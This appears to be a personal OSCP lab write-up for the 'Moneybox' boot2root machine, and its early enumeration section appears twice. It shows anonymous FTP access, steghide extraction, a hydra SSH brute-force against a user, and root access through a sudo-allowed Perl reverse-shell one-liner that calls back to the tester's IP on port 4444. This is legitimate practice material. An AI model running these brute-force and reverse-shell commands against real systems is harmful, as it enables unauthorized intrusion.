Moneybox
June 12th, 2023
Switching to markdown format due to all the MD to OSCP report tools that exist
#Enumerate
Given target: 192.168.169.230
##Nmap
sudo nmap --open -sV -sC -p- -sT 192.168.169.230 -oN 192-168-169-230.scan
Output
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-12 15:28 GMT
Nmap scan report for 192.168.169.230
Host is up (0.071s latency).
Not shown: 64136 closed tcp ports (conn-refused), 1396 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.201
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e30ce7281e0a23d5c28888b12acfaac (RSA)
| 256 019dfafbf20637c012fc018b248f53ae (ECDSA)
|_ 256 2f34b3d074b47f8d17d237b12e32f7eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
#Vulnerability Check
##FTP
Anon allowed and image contents are of
ftp 192.168.169.230 21 15:28:37
Connected to 192.168.169.230.
220 (vsFTPd 3.0.3)
Name (192.168.169.230:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10274|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
229 Entering Extended Passive Mode (|||46815|)
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
100% |********************************| 1068 KiB 1.46 MiB/s 00:00 ETA
226 Transfer complete.
1093656 bytes received in 00:00 (1.33 MiB/s)
ftp> exit
221 Goodbye.
kali 🏡 OSCP Moneybox
→ ls 15:33:02
192-168-169-230.scan trytofind.jpg
kali 🏡 OSCP Moneybox
→ file trytofind.jpg 15:33:04
trytofind.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 3984x2988, components 3
kali 🏡 OSCP Moneybox
→ gwenview trytofind.jpg
Image: https://i.imgur.com/nR5L7Gv.png
##SSH
meh
##http
###Apache httpd 2.4.38
searchsploit Apache 2.4
Output
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote C | php/remote/29316.py
Apache 2.2.4 - 413 Error HTTP Request Meth | unix/remote/30835.sh
Apache 2.4.17 - Denial of Service | windows/dos/39037.php
Apache 2.4.17 < 2.4.38 - 'apache2ctl grace | linux/local/46676.php
Apache 2.4.23 mod_http2 - Denial of Servic | linux/dos/40909.py
Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal() | php/remote/40142.php
Apache 2.4.7 mod_status - Scoreboard Handl | linux/dos/34133.txt
Apache 2.4.x - Buffer Overflow | multiple/webapps/51193.py
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memor | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial o | multiple/dos/26710.txt
Apache HTTP Server 2.4.49 - Path Traversal | multiple/webapps/50383.sh
Apache HTTP Server 2.4.50 - Path Traversal | multiple/webapps/50406.sh
Apache HTTP Server 2.4.50 - Remote Code Ex | multiple/webapps/50446.sh
Apache HTTP Server 2.4.50 - Remote Code Ex | multiple/webapps/50512.py
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/764.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' | linux/webapps/39642.txt
Apache Shiro 1.2.4 - Cookie RememberME Des | multiple/remote/48410.rb
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' | multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' I | multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files | multiple/remote/21491.txt
Apache Tomcat < 5.5.17 - Remote Directory | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denia | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local | linux/remote/34.pl
------------------------------------------- ---------------------------------
Shellcodes: No Results
------------------------------------------- ---------------------------------
Paper Title | Path
------------------------------------------- ---------------------------------
Apache HTTP Server 2.4.50 Path Traversal a | docs/english/50552-apache-http-s
------------------------------------------- ---------------------------------
###Directories
gobuster dir -u http://192.168.169.230:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Output
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.169.230:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/12 15:39:36 Starting gobuster in directory enumeration mode
===============================================================
/blogs (Status: 301) [Size: 318] [--> http://192.168.169.230/blogs/]
/server-status (Status: 403) [Size: 280]
####http://192.168.169.230/blogs/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>I'm T0m-H4ck3r</h1><br>
<p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
<p>If You Want Hint For Next Step......?<p>
</body>
</html>
<!--the hint is the another secret directory is S3cr3t-T3xt-->
####http://192.168.169.230/S3cr3t-T3xt/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>There is Nothing In this Page.........</h1>
</body>
</html>
<!..Secret Key 3xtr4ctd4t4 >
Maybe SSH or steg since I got an image before.
Password looks like 1337 speak for "Extracted" so I'll try the password on ssh then go for steg
#Exploit
##SSH
####Retrieved Password Attempt
ssh moneybox@192.168.169.230
3xtr4ctd4t4
NOPE. Also with cap M is also not working
##Steg
3xtr4ctd4t4
Find top steg tools. Start at #1 and go down until it works...
1. Steghide
2. Stegoshare
3. Wavsteg
4. Snow
5. Steganoroute
#Privilege Escalation
Switching to markdown format due to all the MD to OSCP report tools that exist
#Enumerate
Given target: 192.168.169.230
##Nmap
sudo nmap --open -sV -sC -p- -sT 192.168.169.230 -oN 192-168-169-230.scan
Output
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-12 15:28 GMT
Nmap scan report for 192.168.169.230
Host is up (0.071s latency).
Not shown: 64136 closed tcp ports (conn-refused), 1396 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.201
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e30ce7281e0a23d5c28888b12acfaac (RSA)
| 256 019dfafbf20637c012fc018b248f53ae (ECDSA)
|_ 256 2f34b3d074b47f8d17d237b12e32f7eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
#Vulnerability Check
##FTP
Anon allowed and image contents are of
ftp 192.168.169.230 21 15:28:37
Connected to 192.168.169.230.
220 (vsFTPd 3.0.3)
Name (192.168.169.230:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10274|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
229 Entering Extended Passive Mode (|||46815|)
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
100% |********************************| 1068 KiB 1.46 MiB/s 00:00 ETA
226 Transfer complete.
1093656 bytes received in 00:00 (1.33 MiB/s)
ftp> exit
221 Goodbye.
kali 🏡 OSCP Moneybox
→ ls 15:33:02
192-168-169-230.scan trytofind.jpg
kali 🏡 OSCP Moneybox
→ file trytofind.jpg 15:33:04
trytofind.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 3984x2988, components 3
kali 🏡 OSCP Moneybox
→ gwenview trytofind.jpg
Image: https://i.imgur.com/nR5L7Gv.png
##SSH
meh
##http
###Apache httpd 2.4.38
searchsploit Apache 2.4
Output
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote C | php/remote/29316.py
Apache 2.2.4 - 413 Error HTTP Request Meth | unix/remote/30835.sh
Apache 2.4.17 - Denial of Service | windows/dos/39037.php
Apache 2.4.17 < 2.4.38 - 'apache2ctl grace | linux/local/46676.php
Apache 2.4.23 mod_http2 - Denial of Servic | linux/dos/40909.py
Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal() | php/remote/40142.php
Apache 2.4.7 mod_status - Scoreboard Handl | linux/dos/34133.txt
Apache 2.4.x - Buffer Overflow | multiple/webapps/51193.py
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memor | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial o | multiple/dos/26710.txt
Apache HTTP Server 2.4.49 - Path Traversal | multiple/webapps/50383.sh
Apache HTTP Server 2.4.50 - Path Traversal | multiple/webapps/50406.sh
Apache HTTP Server 2.4.50 - Remote Code Ex | multiple/webapps/50446.sh
Apache HTTP Server 2.4.50 - Remote Code Ex | multiple/webapps/50512.py
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/764.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' | linux/webapps/39642.txt
Apache Shiro 1.2.4 - Cookie RememberME Des | multiple/remote/48410.rb
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' | multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' I | multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files | multiple/remote/21491.txt
Apache Tomcat < 5.5.17 - Remote Directory | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denia | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local | linux/remote/34.pl
------------------------------------------- ---------------------------------
Shellcodes: No Results
------------------------------------------- ---------------------------------
Paper Title | Path
------------------------------------------- ---------------------------------
Apache HTTP Server 2.4.50 Path Traversal a | docs/english/50552-apache-http-s
------------------------------------------- ---------------------------------
###Directories
gobuster dir -u http://192.168.169.230:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Output
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.169.230:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/12 15:39:36 Starting gobuster in directory enumeration mode
===============================================================
/blogs (Status: 301) [Size: 318] [--> http://192.168.169.230/blogs/]
/server-status (Status: 403) [Size: 280]
####http://192.168.169.230/blogs/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>I'm T0m-H4ck3r</h1><br>
<p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
<p>If You Want Hint For Next Step......?<p>
</body>
</html>
<!--the hint is the another secret directory is S3cr3t-T3xt-->
####http://192.168.169.230/S3cr3t-T3xt/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>There is Nothing In this Page.........</h1>
</body>
</html>
<!..Secret Key 3xtr4ctd4t4 >
Maybe SSH or steg since I got an image before.
Password looks like 1337 speak for "Extracted" so I'll try the steg then try bruteforce on ssh since I still need a username
#Exploit
##Steg
3xtr4ctd4t4
Find top steg tools. Start at #1 and go down until it works...
###1. Steghide
steghide extract -sf trytofind.jpg -p 3xtr4ctd4t4 16:06:13
wrote extracted data to "data.txt".
kali 🏡 OSCP Moneybox
→ cat data.txt 16:06:14
Hello..... renu
I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
Skip the rest and now I bruteforce ssh with user renu
2. Stegoshare
3. Wavsteg
4. Snow
5. Steganoroute
##SSH
###Bruteforce
hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.169.230
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-12 16:10:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.169.230:22/
[22][ssh] host: 192.168.169.230 login: renu password: 987654321
Now to test the password as Hydra is known to hallucinate
ssh renu@192.168.169.230 16:11:14
renu@192.168.169.230's password:
Linux MoneyBox 4.19.0-22-amd64 #1 SMP Debian 4.19.260-1 (2022-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep 23 10:00:13 2022
renu@MoneyBox:~$ ls
ftp local.txt
renu@MoneyBox:~$ cat local.txt
6a1be9298138e1ff1514bcc04fd8737f
Now onto priv esc
#Privilege Escalation
##Sudo privlleges
renu@MoneyBox:~$ sudo -l
[sudo] password for renu:
Sorry, user renu may not run sudo on MoneyBox.
RIP
##File system exploring
Nothing in BashRC
User lily found
Binary privilege check
renu@MoneyBox:/$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 51184 Oct 10 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
Nothing promising
I can dump lily's keys though and switch to her user account
renu@MoneyBox:/home/lily$ cat .ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian
renu@MoneyBox:/home/lily$ ssh lily@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-22-amd64 #1 SMP Debian 4.19.260-1 (2022-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$
Now to check what she can run
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
So she can run perl as root. Escalate to root via perl syntax.
lily@MoneyBox:~$ perl -e 'exec "/bin/bash";'
lily@MoneyBox:~$ sudo !!
sudo exit
[sudo] password for lily:
Sorry, try again.
Didn't work so I'll try a rev shell
Set up catch
nc -nlvp 4444
My IP
→ ip route | grep tun 16:27:41
192.168.45.0/24 dev tun0 proto kernel scope link src 192.168.45.201
192.168.169.0/24 via 192.168.45.254 dev tun0
Rev Shell Script:
perl -e 'use Socket;$i="192.168.45.201";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Make sure to run it as sudo since lily can!
kali 🏡
→ nc -nlvp 4444 16:32:23
listening on [any] 4444 ...
connect to [192.168.45.201] from (UNKNOWN) [192.168.169.230] 46150
# whoami
root
# ls
# cd
# ls
proof.txt
# cat proof
cat: proof: No such file or directory
# cat proof.txt
80ba0c566d8598739895252de4e0f324
Boot2Root